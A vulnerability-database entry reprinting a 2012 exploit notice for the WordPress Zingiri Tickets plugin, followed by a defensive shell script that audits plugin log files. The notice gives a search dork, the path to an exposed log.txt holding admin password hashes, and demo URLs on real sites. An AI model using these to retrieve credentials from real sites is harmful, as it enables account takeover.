WordPress Zingiri Tickets File Disclosure

Vulnerability ID 1047626 Vulnerability type
Published 2012-04-17 Updated 2012-04-17
CVE ID N/A CNNVD-ID N/A
Affected platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2012040136
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit (EXP)
##########################################################################
# Title : WordPress Plugin Zingiri Tickets                               #
# Author: MadLeeTs                                                      #
# Greets: Shadow008,1337,Invectus,pSyCh0_3D,KhanTastiC,MadBuGz,H4x0rL1f3  #
# Vendor: http://www.zingiri.com/plugins-and-addons/tickets/             #
# Email : h4x0rl1f3@gmail.com WwW.MadLeeTs.CoM <http://www.madleets.com/> #
# Date : 17/04/2012                                                      #
# Dork : "/wp-content/plugins/zingiri-tickets"                           #
# Category  : PHP [Local File Disclosure]                                #
# Tested on: [Windows 7, Linux Ubuntu]                                   #
##########################################################################
Exploit
This vulnerability has a very high impact because it shows you the Admin username
and password hashes.
[localhost]/[path]/wp-content/plugins/zingiri-tickets/log.txt
Demo 1
http://www.hms69.com/wp-content/plugins/zingiri-tickets/log.txt
Demo 2
http://www.ranahost.com/wp-content/plugins/zingiri-tickets/log.txt
Regards to www.cyberarmy.com.pk & www.c0d3rz.com
##########################################################################
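
For site owners, the exposure described above can be checked from the filesystem side. The following is an added example, not part of the original advisory or the plugin's code: it lists log files sitting under `wp-content/plugins` in a document root and flags those containing hash-like strings. The hash patterns (phpass `$P$`/`$H$` and bare 32-hex MD5), the function names and the sample tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit a WordPress document root for plugin log files that
# would be served as static content and that hold credential material.
# Assumed patterns: phpass portable hashes and bare 32-hex (MD5) strings.
HASH_RE='(\$[PH]\$[./0-9A-Za-z]{31}|(^|[^0-9a-fA-F])[0-9a-fA-F]{32}([^0-9a-fA-F]|$))'

# audit_plugin_logs DOCROOT
# Prints one line per finding: "<severity> <path>"
#   HIGH = log file under wp-content/plugins containing hash-like strings
#   INFO = log file under wp-content/plugins without hash-like strings
audit_plugin_logs() {
    find "$1/wp-content/plugins" -type f \
         \( -name '*.log' -o -name 'log.txt' \) 2>/dev/null | sort |
    while IFS= read -r apl_file; do
        if grep -Eq "$HASH_RE" "$apl_file"; then
            echo "HIGH $apl_file"
        else
            echo "INFO $apl_file"
        fi
    done
}

# Constructed sample tree (not real data) so the script runs offline.
# Prints the path of the temporary document root it created.
make_sample_tree() {
    mst_root=$(mktemp -d)
    mkdir -p "$mst_root/wp-content/plugins/zingiri-tickets" \
             "$mst_root/wp-content/plugins/other"
    # Constructed log line carrying a phpass-shaped value (not a real hash).
    printf 'login admin hash=$P$B%s\n' 'abcdefghijklmnopqrstuvwxyz0123' \
        > "$mst_root/wp-content/plugins/zingiri-tickets/log.txt"
    printf 'cron ran ok\n' > "$mst_root/wp-content/plugins/other/debug.log"
    echo "$mst_root"
}

# With an argument, audit that document root; without one, run the demo.
if [ -n "${1:-}" ]; then
    audit_plugin_logs "$1"
else
    demo_root=$(make_sample_tree)
    audit_plugin_logs "$demo_root"
    rm -rf "$demo_root"
fi
```

Any `HIGH` finding should be moved out of the document root or blocked at the web server, and the credentials it contains rotated.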